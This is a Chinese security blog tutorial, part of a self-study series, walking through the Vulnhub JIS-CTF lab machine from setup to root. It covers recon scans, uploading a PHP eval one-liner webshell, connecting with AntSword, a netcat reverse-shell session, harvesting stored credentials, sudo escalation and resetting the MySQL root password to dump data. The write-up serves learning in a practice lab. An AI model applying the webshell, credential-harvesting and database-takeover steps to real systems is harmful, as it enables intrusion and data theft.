[網絡安全自學篇] 六十五.Vulnhub靶機滲透之環境搭建及JIS-CTF入門和蟻劍提權示例(一)

這是做者的網絡安全自學教程系列,主要是關於安全工具和實踐操做的在線筆記,特分享出來與博友們學習,但願您們喜歡,一塊兒進步。前文分享了SMBv3服務遠程代碼執行漏洞(CVE-2020-0796),攻擊者可能利用此漏洞遠程無需用戶驗證,執行惡意代碼並獲取機器的徹底控制。本文將詳細講解Vulnhub靶機滲透的環境搭建和JIS-CTF題目,採用Nmap、Dirb、中國蟻劍、敏感文件分析、SSH遠程鏈接、Shell提權等獲取5個flag。因爲hack the box速度堪憂,做者選擇了Vulnhub靶場,但願深刻分析來幫助初學者。本文是一篇Web滲透的基礎性文章,但願對您有所幫助。php

做者做爲網絡安全的小白,分享一些自學基礎教程給你們,主要是關於安全工具和實踐操做的在線筆記,但願您們喜歡。同時,更但願您能與我一塊兒操做和進步,後續將深刻學習網絡安全和系統安全知識並分享相關實驗。總之,但願該系列文章對博友有所幫助,寫文不易,大神們不喜勿噴,謝謝!若是文章對您有幫助,將是我創做的最大動力,點贊、評論、私聊都可,一塊兒加油喔~css

PS:本文參考了github、安全網站和參考文獻中的文章(詳見參考文獻),並結合本身的經驗和實踐進行撰寫,也推薦你們閱讀參考文獻。html

做者的github資源:
軟件安全:https://github.com/eastmountyxz/Software-Security-Course
其餘工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study

python


聲明:本人堅定反對利用教學方法進行犯罪的行爲,一切犯罪行爲必將受到嚴懲,綠色網絡須要咱們共同維護,更推薦你們瞭解它們背後的原理,更好地進行防禦。mysql

前文學習:
[網絡安全自學篇] 一.入門筆記之看雪Web安全學習及異或解密示例
[網絡安全自學篇] 二.Chrome瀏覽器保留密碼功能滲透解析及登陸加密入門筆記
[網絡安全自學篇] 三.Burp Suite工具安裝配置、Proxy基礎用法及暴庫示例
[網絡安全自學篇] 四.實驗吧CTF實戰之WEB滲透和隱寫術解密
[網絡安全自學篇] 五.IDA Pro反彙編工具初識及逆向工程解密實戰
[網絡安全自學篇] 六.OllyDbg動態分析工具基礎用法及Crakeme逆向
[網絡安全自學篇] 七.快手視頻下載之Chrome瀏覽器Network分析及Python爬蟲探討
[網絡安全自學篇] 八.Web漏洞及端口掃描之Nmap、ThreatScan和DirBuster工具
[網絡安全自學篇] 九.社會工程學之基礎概念、IP獲取、IP物理定位、文件屬性
[網絡安全自學篇] 十.論文之基於機器學習算法的主機惡意代碼
[網絡安全自學篇] 十一.虛擬機VMware+Kali安裝入門及Sqlmap基本用法
[網絡安全自學篇] 十二.Wireshark安裝入門及抓取網站用戶名密碼(一)
[網絡安全自學篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及數據流追蹤和圖像抓取(二)
[網絡安全自學篇] 十四.Python攻防之基礎常識、正則表達式、Web編程和套接字通訊(一)
[網絡安全自學篇] 十五.Python攻防之多線程、C段掃描和數據庫編程(二)
[網絡安全自學篇] 十六.Python攻防之弱口令、自定義字典生成及網站暴庫防禦
[網絡安全自學篇] 十七.Python攻防之構建Web目錄掃描器及ip代理池(四)
[網絡安全自學篇] 十八.XSS跨站腳本攻擊原理及代碼攻防演示(一)
[網絡安全自學篇] 十九.Powershell基礎入門及常見用法(一)
[網絡安全自學篇] 二十.Powershell基礎入門及常見用法(二)
[網絡安全自學篇] 二十一.GeekPwn極客大賽之安全攻防技術總結及ShowTime
[網絡安全自學篇] 二十二.Web滲透之網站信息、域名信息、端口信息、敏感信息及指紋信息收集
[網絡安全自學篇] 二十三.基於機器學習的惡意請求識別及安全領域中的機器學習
[網絡安全自學篇] 二十四.基於機器學習的惡意代碼識別及人工智能中的惡意代碼檢測
[網絡安全自學篇] 二十五.Web安全學習路線及木馬、病毒和防護初探
[網絡安全自學篇] 二十六.Shodan搜索引擎詳解及Python命令行調用
[網絡安全自學篇] 二十七.Sqlmap基礎用法、CTF實戰及請求參數設置(一)
[網絡安全自學篇] 二十八.文件上傳漏洞和Caidao入門及防護原理(一)
[網絡安全自學篇] 二十九.文件上傳漏洞和IIS6.0解析漏洞及防護原理(二)
[網絡安全自學篇] 三十.文件上傳漏洞、編輯器漏洞和IIS高版本漏洞及防護(三)
[網絡安全自學篇] 三十一.文件上傳漏洞之Upload-labs靶場及CTF題目01-10(四)
[網絡安全自學篇] 三十二.文件上傳漏洞之Upload-labs靶場及CTF題目11-20(五)
[網絡安全自學篇] 三十三.文件上傳漏洞之繞狗一句話原理和繞過安全狗(六)
[網絡安全自學篇] 三十四.Windows系統漏洞之5次Shift漏洞啓動計算機
[網絡安全自學篇] 三十五.惡意代碼攻擊溯源及惡意樣本分析
[網絡安全自學篇] 三十六.WinRAR漏洞復現(CVE-2018-20250)及惡意軟件自啓動劫持
[網絡安全自學篇] 三十七.Web滲透提升班之hack the box在線靶場註冊及入門知識(一)
[網絡安全自學篇] 三十八.hack the box滲透之BurpSuite和Hydra密碼爆破及Python加密Post請求(二)
[網絡安全自學篇] 三十九.hack the box滲透之DirBuster掃描路徑及Sqlmap高級注入用法(三)
[網絡安全自學篇] 四十.phpMyAdmin 4.8.1後臺文件包含漏洞復現及詳解(CVE-2018-12613)
[網絡安全自學篇] 四十一.中間人攻擊和ARP欺騙原理詳解及漏洞還原
[網絡安全自學篇] 四十二.DNS欺騙和釣魚網站原理詳解及漏洞還原
[網絡安全自學篇] 四十三.木馬原理詳解、遠程服務器IPC$漏洞及木馬植入實驗
[網絡安全自學篇] 四十四.Windows遠程桌面服務漏洞(CVE-2019-0708)復現及詳解
[網絡安全自學篇] 四十五.病毒詳解及批處理病毒製做(自啓動、修改密碼、定時關機、藍屏、進程關閉)
[網絡安全自學篇] 四十六.微軟證書漏洞CVE-2020-0601 (上)Windows驗證機制及可執行文件簽名復現
[網絡安全自學篇] 四十七.微軟證書漏洞CVE-2020-0601 (下)Windows證書籤名及HTTPS網站劫持
[網絡安全自學篇] 四十八.Cracer第八期——(1)安全術語、Web滲透流程、Windows基礎、註冊表及黑客經常使用DOS命令
[網絡安全自學篇] 四十九.Procmon軟件基本用法及文件進程、註冊表查看
[網絡安全自學篇] 五十.虛擬機基礎之安裝XP系統、文件共享、網絡快照設置及Wireshark抓取BBS密碼
[網絡安全自學篇] 五十一.惡意樣本分析及HGZ木馬控制目標服務器
[網絡安全自學篇] 五十二.Windows漏洞利用之棧溢出原理和棧保護GS機制
[網絡安全自學篇] 五十三.Windows漏洞利用之Metasploit實現棧溢出攻擊及反彈shell
[網絡安全自學篇] 五十四.Windows漏洞利用之基於SEH異常處理機制的棧溢出攻擊及shell提取
[網絡安全自學篇] 五十五.Windows漏洞利用之構建ROP鏈繞過DEP並獲取Shell
[網絡安全自學篇] 五十六.i春秋老師分享小白滲透之路及Web滲透技術總結
[網絡安全自學篇] 五十七.PE文件逆向之什麼是數字簽名及Signtool簽名工具詳解(一)
[網絡安全自學篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反彈shell
[網絡安全自學篇] 五十九.Windows漏洞利用之MS08-067遠程代碼執行漏洞復現及shell深度提權
[網絡安全自學篇] 六十.Cracer第八期——(2)五萬字總結Linux基礎知識和經常使用滲透命令
[網絡安全自學篇] 六十一.PE文件逆向之數字簽名詳細解析及Signcode、PEView、010Editor、Asn1View等工具用法(二)
[網絡安全自學篇] 六十二.PE文件逆向之PE文件解析、PE編輯工具使用和PE結構修改(三)
[網絡安全自學篇] 六十三.hack the box滲透之OpenAdmin題目及蟻劍管理員提權(四)
[網絡安全自學篇] 六十四.Windows漏洞利用之SMBv3服務遠程代碼執行漏洞(CVE-2020-0796)復現及詳解































































linux


前文欣賞:
[滲透&攻防] 一.從數據庫原理學習網絡攻防及防止SQL注入
[滲透&攻防] 二.SQL MAP工具從零解讀數據庫及基礎用法
[滲透&攻防] 三.數據庫之差別備份及Caidao利器
[滲透&攻防] 四.詳解MySQL數據庫攻防及Fiddler神器分析數據包



git



一.Vulnhub簡介

Vulnhub是一個提供各類漏洞環境的靶場,每一個靶場有對應的目標和難度,挑戰者經過網絡闖入系統獲取root權限和查看flag。Vulnhub中包含了各類各樣的鏡像,能夠下載到本身的主機上練習,其大部分的環境是要用VMware或者VirtualBox打開運行的。github

做者看了Vulnhub的題目,是一個很是棒的Web滲透靶場,每一個靶機都是很酷的一個遊戲,須要找到全部的flag和提權,而Hack the box速度堪憂。爲了讓更多朋友瞭解Web滲透基礎知識,做者接下來會陸續分享該系列20篇文章,儘可能選擇技術含量較高的靶場,結合技術點進行講解,但願大家喜歡~web

官方網址:https://www.vulnhub.com正則表達式

在這裏插入圖片描述

該網站包含了不少靶場題目,每一個靶場有對應的鏡像下載地址、描述和難度等級等。好比「Me and My Girlfriend」以下圖所示:
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

在這裏插入圖片描述



二.JIS-CTF題目描述

打開網址顯示的內容以下圖所示,咱們獲取虛擬機格式的鏡像,而後進行環境配置。

在這裏插入圖片描述

描述中顯示「Only working with VirtualBox」,只能工做在VirtualBox中工做,但做者是在VMware虛擬機中完成的實驗。讀者結合自身環境進行滲透測試。

在這裏插入圖片描述



三.Vulnhub環境配置

該部分推薦i春秋F0rmat老師的文章:https://bbs.ichunqiu.com/thread-39761-1-5.html

第一步,下載資源
建議採用迅雷打開下載JIS-CTF-VulnUpload-CTF01.OVA文件。

在這裏插入圖片描述

下載完成以後以下圖所示,能夠看到一個OVA後綴的文件。

在這裏插入圖片描述


第二步,打開VMware虛擬機安裝靶場
找到咱們剛纔下載的文件,導入虛擬機。

在這裏插入圖片描述

選擇存放的位置,而後點擊導入。

在這裏插入圖片描述

若是出現未經過OVF規範一致性或虛擬硬件合規性檢查,請單擊「重試」導入。在編程或Web滲透過程當中,咱們會遇到各類問題和錯誤,須要學會谷歌和百度獨立解決,這也是對你能力的一種提高。

在這裏插入圖片描述


第三步,導入完成以後,設置NAT網絡模式,內存設置爲2G,硬盤設置爲32GB

在這裏插入圖片描述


第四步,點擊開啓虛擬機及配置過程
到開機頁面選擇第二個Ubuntu的高級選項,若是啓動網絡正常的話能夠直接開機,若是網絡不正常能夠按下面步驟操做。

在這裏插入圖片描述

進入高級選項,再次選擇第二個Linux內核版本的恢復模式回車。

在這裏插入圖片描述

等待系統啓動完畢後,看到這個頁面,咱們繼續回車進入。

在這裏插入圖片描述

回車後會彈出選擇界面,咱們選擇root一行回車,接着再次回車進入命令行模式。

在這裏插入圖片描述


第五步,輸入「mount -o rw,remount / 」命令,再配置網絡問卷,不然後面可能沒法保存網絡配置文件

當Linux系統沒法啓動時,一般須要進入單用戶模式修改一些配置文件,或調整一些參數方可啓動。可是在進入單用戶模式後,咱們的文件系統是隻讀模式,沒法進行修改,那麼這個時候就須要用到一條命令「mount –o remount,rw /」。這個命令讓咱們的 / 路徑文件系統的可讀模式能自由修改。

  • mount -o rw,remount /

接着輸入命令查看網卡:

  • ifconfig -a

在這裏插入圖片描述

做者的是ens33,而後繼續輸入命令修改網絡配置文件。

  • vi /etc/network/interfaces

在這裏插入圖片描述

輸入I修改模式,以下圖所示。

在這裏插入圖片描述

修改這兩個地方,改爲你的網卡名稱,而後輸入「:wq」保存。

在這裏插入圖片描述

最後輸入reboot重啓便可。

在這裏插入圖片描述

運行結果以下圖所示,我一直登陸不進去(不知道用戶名和密碼)。最初覺得是要求用VirtualBox虛擬機的緣由,後來反應過來,此時彷佛Kali上場開始滲透了。

在這裏插入圖片描述



四.Vulnhub靶機滲透詳解

1.信息收集

首先是信息收集一波,任何網站或Web都須要進行一波掃描和分析。

第一步,掃描網卡名稱

  • netdiscover -i

在這裏插入圖片描述


第二步,調用Nmap探測目標主機IP

  • nmap -sn 192.168.44.0/24

因爲在同一個網段,因此和主機IP地址近視,掃描結果以下圖所示,靶場IP爲192.168.44.143。

在這裏插入圖片描述


第三步,調用Nmap探測靶機的開放端口信息

  • nmap -A 192.168.44.143
  • 22端口:SSH遠程鏈接
  • 80端口:HTTP網站協議

在這裏插入圖片描述


第四步,利用dirb掃描80端口的目錄文件,敏感文件分析很是重要

  • dirb http://192.168.44.143

相關目錄:

  • http://192.168.44.143/admin_area/
  • http://192.168.44.143/assets/
  • http://192.168.44.143/css/
  • http://192.168.44.143/flag/
  • http://192.168.44.143/index.php
  • http://192.168.44.143/js/
  • http://192.168.44.143/robots.txt
  • http://192.168.44.143/flag/index.html
  • http://192.168.44.143/admin_area/index.ph

在這裏插入圖片描述

在這裏插入圖片描述


第五步,調用whatweb查看環境

  • whatweb 192.168.44.143/login.php

在這裏插入圖片描述


第六步,敏感文件分析

  • 登錄界面:
    192.168.44.143/index.php、192.168.44.143/login.php

在這裏插入圖片描述

  • 系統信息:發現目錄瀏覽漏洞,以及apache版本信息
    192.168.44.143/assets/

在這裏插入圖片描述

  • robots.txt文件發現目錄泄露,其中flag文件夾應該有問題
    192.168.44.143/robots.txt

在這裏插入圖片描述

作到這裏,信息掃描步驟基本介紹,接下來開始靶機滲透。



2.First flag

咱們從敏感文件robots.txt中獲取目錄信息,查看內容以下圖所示:

在這裏插入圖片描述

接着咱們發現一個敏感的關鍵詞flag,輸入目標地址:192.168.44.143/flag/,第一個flag浮出水面,比較基礎,是敏感文件和目錄相關。

The 1st flag is : {8734509128730458630012095}

在這裏插入圖片描述



3.Second flag

在地址欄中輸入:http://192.168.44.143/admin_area/,顯示以下圖所示:

在這裏插入圖片描述

右鍵查看源碼獲得第二個flag,也是比較簡單的知識點。
The 2nd flag is : {7412574125871236547895214}

在這裏插入圖片描述

與第二個flag同時出現的還有一個帳號和密碼,說明接下來咱們須要利用這個帳號信息。

<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!-- username : admin password : 3v1l_H@ck3r The 2nd flag is : {7412574125871236547895214} -->
</body>
</html>


4.Third flag

登陸分析

咱們以前打開了登陸頁面,但沒有帳號和密碼。這裏是否能用上面的帳號和密碼呢?接着咱們進行了登陸嘗試,返回頁面是一個文件上傳。

  • http://192.168.44.143/login.php
  • username : admin
  • password : 3v1l_H@ck3r

在這裏插入圖片描述


上傳一句話木馬

登陸以後是一個上傳頁面,咱們嘗試上傳一句話木馬。

在這裏插入圖片描述

<?php @eval($_POST["eastmount"]); ?>

因爲該網站採用PHP編寫,一句話木馬以下所示,咱們在Kali瀏覽器中打開並上傳。

在這裏插入圖片描述

上傳文件成功。

在這裏插入圖片描述

接下來咱們用要蟻劍來鏈接。

  • http://192.168.44.143/uploaded_files/shell.php

在這裏插入圖片描述



Kali系統安裝中國蟻劍

接着咱們須要使用中國蟻劍來提取Webshell。蟻劍怎麼在Kali下安裝和使用呢?中國蟻劍推薦你們閱讀以下文章,它是很是強大的一款滲透工具。

第一步,下載中國蟻劍可使用git命令,也能夠直接從github中下載。

git clone https://github.com/antoor/antSword.git
cd antSword

在這裏插入圖片描述

做者從官網下載對應的Linux版本。

在這裏插入圖片描述


第二步,打開Kali終端找到你下載的中國蟻劍壓縮包並解壓。

unzip AntSword-Loader-v4.0.3-linux-x64.zip

在這裏插入圖片描述

解壓顯示以下圖所示:

在這裏插入圖片描述


第三步,進入中國蟻劍壓縮包並打開蟻劍。

在這裏插入圖片描述

./AntSword

蟻劍打開以下圖所示:

在這裏插入圖片描述


第四步,建立一個空文件夾(用全英文名字)。

在這裏插入圖片描述

而後點擊蟻劍「初始化」按鈕,找到你新建的文件夾,並選擇它進行安裝。

在這裏插入圖片描述

執行結束以後,「./AntSword」會出現這個界面,說明安裝成功。

在這裏插入圖片描述



蟻劍提權

第一步,利用前面上傳的一句話木馬。

<?php @eval($_POST['eastmount']);?>

第二步,運行蟻劍,右鍵單擊「添加數據」,輸入URL地址,鏈接密碼以及編碼設置。PHP語言推薦編輯器使用chr加密。

URL:http://192.168.44.143/uploaded_files/shell.php
密碼:eastmount

在這裏插入圖片描述

接着整個後臺顯示出來,以下圖所示,是否是感覺到了蟻劍的強大。


第三步,右鍵文件管理查看webshell目錄

在這裏插入圖片描述

找到/var/www/html/目錄下,看到hint.txt和flag.txt文件。

在這裏插入圖片描述

直接打開hint.txt文件,咱們看到了第三個flag和用戶名technawi,該用戶名又能作什麼呢?

try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉

The 3rd flag is : {7645110034526579012345670}

在這裏插入圖片描述

注意,這裏若是您對信息比較敏感,可能會經過直接訪問hint.txt獲得第三個flag和用戶technawi。但更推薦你們嘗試中國蟻劍和一句話木馬的滲透方法。

在這裏插入圖片描述


第四步,gobuster目錄掃描
注意,hint.txt文件是可以直接訪問的,但flag.txt文件卻沒法訪問。咱們補充一個目錄掃描知識點,使用gobuster依次掃各目錄下的txt文件。robots.txt和hint.txt目錄爲200,表示能直接訪問,其餘目錄均不能直接訪問,flag.txt提示403。

  • /robots.txt (Status: 200)
  • /hint.txt (Status: 200)
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.44.143 -t 100 -x txt
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/flag (Status: 301)
/flag.txt (Status: 403)
/robots.txt (Status: 200)
/uploaded_files (Status: 301)
/hint.txt (Status: 200)
/server-status (Status: 403)

那怎麼才能獲取flag.txt內容呢?此時你須要想到用戶權限的限制和提取處理。

最後補充另外一種提權方法,上傳php-reverse-shell反彈shell到kali攻擊機獲得shell。

root@redwand:~# rlwrap nc -lvp 6666
listening on [any] 6666 ...
192.168.0.149: inverse host lookup failed: Unknown host
connect to [192.168.0.103] from (UNKNOWN) [192.168.0.149] 56148
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:28:10 up 52 min,  0 users,  load average: 0.00, 2.25, 3.94
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Jordaninfosec-CTF01:/$


5.Fourth flag

剛纔在第三個flag提示咱們「try to find user technawi password to read the flag.txt file, you can find it in a hidden file 」,表示須要用technawi讀取flag.txt文件,咱們能夠在隱藏文件中找到用戶的信息。那怎麼去實現呢?


第一步,咱們在蟻劍中啓動shell的命令行模式,命令「2>/dev/null」表示過濾掉相似沒有權限的信息。

  • find / -user ‘technawi’ 2>/dev/null

在這裏插入圖片描述

咱們看到了一個特殊的文件/etc/mysql/conf.d/credentials.txt ,嘗試去讀一下里面的信息,獲得flag。

在這裏插入圖片描述

(www-data:/var/www/html) $ find / -user 'technawi' 2>/dev/null
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi
/home/technawi/.cache
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
(www-data:/var/www/html) $ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
(www-data:/var/www/html) $

獲取第四個Flag和technawi用戶對應的密碼。

  • The 4th flag is : {7845658974123568974185412}
  • username : technawi
  • password : 3vilH@ksor


6.Fifth flag

若是直接讀取flag.txt文件,顯示爲空,須要對應的用戶和權限。

在這裏插入圖片描述

在這裏插入圖片描述

接着咱們採用SSH鏈接,帳號和密碼爲第4個flag獲取的值。

  • username : technawi
  • password : 3vilH@ksor
  • ssh technawi@192.168.44.143

在這裏插入圖片描述

找到登錄用戶technawi,而後去讀取剛纔flag.txt文件 ,獲得最後的flag。

  • cat /var/www/html/flag.txt
  • The 5th flag is : {5473215946785213456975249}

在這裏插入圖片描述



7.sudo提權

在Web滲透中,提權和數據庫獲取也是很是重要的知識點。儘管Vulnhub是滲透靶場,但獲取flag並非咱們的惟一目標,提權也頗有意思。前面咱們在home目錄下發現 .sudo_as_admin_successful 文件,表示須要使用sudo提權。

  • root權限能夠直接使用sudo su -得到

在這裏插入圖片描述


首先咱們使用sudo -l看看sudo權限。

在這裏插入圖片描述

顯示「ALL」說明technawi能夠用本身的密碼切換爲 root 用戶,輸入「sudo su root」命令,密碼爲3vilH@ksor。權限成功從technawi提高爲root。

在這裏插入圖片描述



8.獲取數據庫數據

一樣數據庫操做也很是有意思,咱們嘗試獲取mysql數據庫內容。

核心步驟爲:登陸root權限,新建目錄並使用命令跳過輸入密碼過程

  • mkdir -p /var/run/mysqld
  • chown -R mysql:mysql /var/run/mysqld
  • mysqld_safe --skip-grant-tables &
technawi@Jordaninfosec-CTF01:/var/www$ sudo su root
root@Jordaninfosec-CTF01:/var/www# whoami
root
root@Jordaninfosec-CTF01:/var/www# ls
html
root@Jordaninfosec-CTF01:/var/www# mkdir -p /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# chown -R mysql:mysql /var/run/mysqld
root@Jordaninfosec-CTF01:/var/www# mysqld_safe --skip-grant-tables &
[1] 1910
root@Jordaninfosec-CTF01:/var/www# 2020-04-10T06:31:09.933846Z mysqld_safe Logging to syslog.
2020-04-10T06:31:09.936319Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-04-10T06:31:09.941145Z mysqld_safe Logging to '/var/log/mysql/error.log'.
2020-04-10T06:31:09.959551Z mysqld_safe A mysqld process already exists

輸出結果以下圖所示:

在這裏插入圖片描述

接着新開一個終端mysql -uroot無密碼登錄便可,但做者老是報錯。

在這裏插入圖片描述


哎!本身仍是太弱了,最後該部分補充Redwand老師的成功代碼。
[VulnHub] JIS-CTF - redwand

root@Jordaninfosec-CTF01:/tmp# mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

查看數據庫以下:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
4 rows in set (0.00 sec)

查看mysql.user表以下:

mysql> select host,user,authentication_string,plugin from user;
+-----------+------------------+-------------------------------------------+-----------------------+
| host      | user             | authentication_string                     | plugin                |
+-----------+------------------+-------------------------------------------+-----------------------+
| localhost | root             | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | mysql_native_password |
| localhost | mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | mysql_native_password |
| localhost | debian-sys-maint | *C46C96C2990814041379A76A744EE3E5026A0D64 | mysql_native_password |
+-----------+------------------+-------------------------------------------+-----------------------+

更新root密碼爲123456以下:

mysql> update user set authentication_string=password("123456") where user="root";
Query OK, 0 rows affected, 1 warning (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 1
mysql>flush privileges;

mysqldump導出須要的數據庫,完成mysql脫褲。

root@Jordaninfosec-CTF01:/tmp# mysqldump -uroot -p sys > sys.sql
Enter password:


五.總結

寫道這裏,這篇文章講解完畢,後續會更深刻的分享。文章內容包括:

  • netdiscover 用於發現目標ip
  • nmap進行端口掃描
  • dirb進行目錄掃描
  • 敏感文件獲取及分析
  • php木馬生成和蟻劍工具
  • ssh遠程鏈接
  • sudo提權
  • 數據庫脫褲

但願這系列文章對您有所幫助,真的感受本身技術好菜,要學的知識好多。轉眼4月份到來,這是第65篇原創的安全系列文章,從網絡安全到系統安全,從木馬病毒到後門劫持,從惡意代碼到溯源分析,從滲透工具到二進制工具,還有Python安全、頂會論文、黑客比賽和漏洞分享。未知攻焉知防,人生漫漫其路遠兮,做爲初學者,本身真是爬着前行;同時學術論文得深刻了,加油!感謝不少人的幫助,繼續爬着,繼續加油!

歡迎你們討論,是否以爲這系列文章幫助到您!任何建議均可以評論告知讀者,共勉。

(By:Eastmount 2020-04-15 晚上10點寫於貴陽 http://blog.csdn.net/eastmount/)


參考文獻:
[1] https://www.vulnhub.com
[2] 教你怎麼用Vulnhub來搭建環境 - i春秋老師F0rmat
[3] [VulnHub] JIS-CTF - redwand
[4] OSCP - JIS-CTF-VulnUpload-CTF01 - 青蛙愛輪滑
[5] JIS-CTF_VulnUpload靶機攻略 - FreeBuf yangyangwithgnu
[6] Vulnhub JIS-CTF-VulnUpload靶機滲透 - A1oe
[7] vulnhub靶場滲透學習-JIS-CTF - Shang176

相關文章
相關標籤/搜索